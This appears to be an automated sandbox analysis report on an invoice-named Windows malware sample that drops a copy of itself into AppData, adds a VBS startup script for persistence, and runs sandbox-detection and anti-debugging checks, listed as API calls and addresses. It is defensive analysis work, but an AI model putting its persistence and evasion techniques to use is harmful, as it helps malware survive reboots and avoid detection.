Source:	Binary string: wntdll.pdbUGP source: gehlenite.exe, 00000002.00000003.1429734158.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, gehlenite.exe, 00000002.00000003.1430483738.0000000003840000.00000004.00001000.00020000.00000000.sdmp, gehlenite.exe, 00000005.00000003.1556729477.0000000003590000.00000004.00001000.00020000.00000000.sdmp, gehlenite.exe, 00000005.00000003.1554686098.00000000033F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: gehlenite.exe, 00000002.00000003.1429734158.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, gehlenite.exe, 00000002.00000003.1430483738.0000000003840000.00000004.00001000.00020000.00000000.sdmp, gehlenite.exe, 00000005.00000003.1556729477.0000000003590000.00000004.00001000.00020000.00000000.sdmp, gehlenite.exe, 00000005.00000003.1554686098.00000000033F0000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\fatura098002.exe

Code function: 0_2_007042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_007042DE

Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00720A76 push ecx; ret	0_2_00720A89
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_007A1005 push esi; ret	0_2_007A100E
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_00660A76 push ecx; ret	2_2_00660A89
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006E1005 push esi; ret	2_2_006E100E
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 5_2_00DF2C21 pushad ; retf	5_2_00DF2C23

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Source: C:\Users\user\Desktop\fatura098002.exe

File created: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gehlenite.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gehlenite.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gehlenite.vbs

Jump to behavior

Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_0071F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	0_2_0071F98E
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00791C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	0_2_00791C41
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_0065F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	2_2_0065F98E
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006D1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	2_2_006D1C41

Source: C:\Users\user\Desktop\fatura098002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fatura098002.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Users\user\Desktop\fatura098002.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep			graph_0-98046

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	API/Special instruction interceptor: Address: EB1FF4
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	API/Special instruction interceptor: Address: DF1FAC

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\Desktop\fatura098002.exe	API coverage: 3.4 %
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	API coverage: 3.6 %

Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_0073C2A2 FindFirstFileExW,	0_2_0073C2A2
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_007768EE FindFirstFileW,FindClose,	0_2_007768EE
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_0077698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0077698F
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_0076D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0076D076
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_0076D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0076D3A9
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00779642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00779642
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_0077979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0077979D
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00779B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00779B2B
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_0076DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0076DBBE
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00775C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00775C97
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_0067C2A2 FindFirstFileExW,	2_2_0067C2A2
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006B68EE FindFirstFileW,FindClose,	2_2_006B68EE
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006B698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	2_2_006B698F
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006AD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_006AD076
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006AD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_006AD3A9
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006B9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_006B9642
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006B979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_006B979D
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006B9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	2_2_006B9B2B
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006ADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	2_2_006ADBBE
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006B5C97 FindFirstFileW,FindNextFileW,FindClose,	2_2_006B5C97

Source: C:\Users\user\Desktop\fatura098002.exe

Code function: 0_2_007042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_007042DE

Source: RegSvcs.exe, 00000003.00000002.2652649419.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2652647030.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\fatura098002.exe	API call chain: ExitProcess graph end node			graph_0-96331
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\fatura098002.exe

Code function: 0_2_0077EAA2 BlockInput,

0_2_0077EAA2

Source: C:\Users\user\Desktop\fatura098002.exe

Code function: 0_2_00732622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00732622

Source: C:\Users\user\Desktop\fatura098002.exe

Code function: 0_2_007042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_007042DE

Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00724CE8 mov eax, dword ptr fs:[00000030h]	0_2_00724CE8
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00FD27B8 mov eax, dword ptr fs:[00000030h]	0_2_00FD27B8
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00FD2818 mov eax, dword ptr fs:[00000030h]	0_2_00FD2818
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00FD1178 mov eax, dword ptr fs:[00000030h]	0_2_00FD1178
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_00664CE8 mov eax, dword ptr fs:[00000030h]	2_2_00664CE8
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_00EB22C0 mov eax, dword ptr fs:[00000030h]	2_2_00EB22C0
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_00EB2260 mov eax, dword ptr fs:[00000030h]	2_2_00EB2260
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_00EB0C20 mov eax, dword ptr fs:[00000030h]	2_2_00EB0C20
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 5_2_00DF0BD8 mov eax, dword ptr fs:[00000030h]	5_2_00DF0BD8
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 5_2_00DF2278 mov eax, dword ptr fs:[00000030h]	5_2_00DF2278
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 5_2_00DF2218 mov eax, dword ptr fs:[00000030h]	5_2_00DF2218

Source: C:\Users\user\Desktop\fatura098002.exe

Code function: 0_2_00760B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00760B62

Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00732622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00732622
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_0072083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0072083F
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_007209D5 SetUnhandledExceptionFilter,	0_2_007209D5
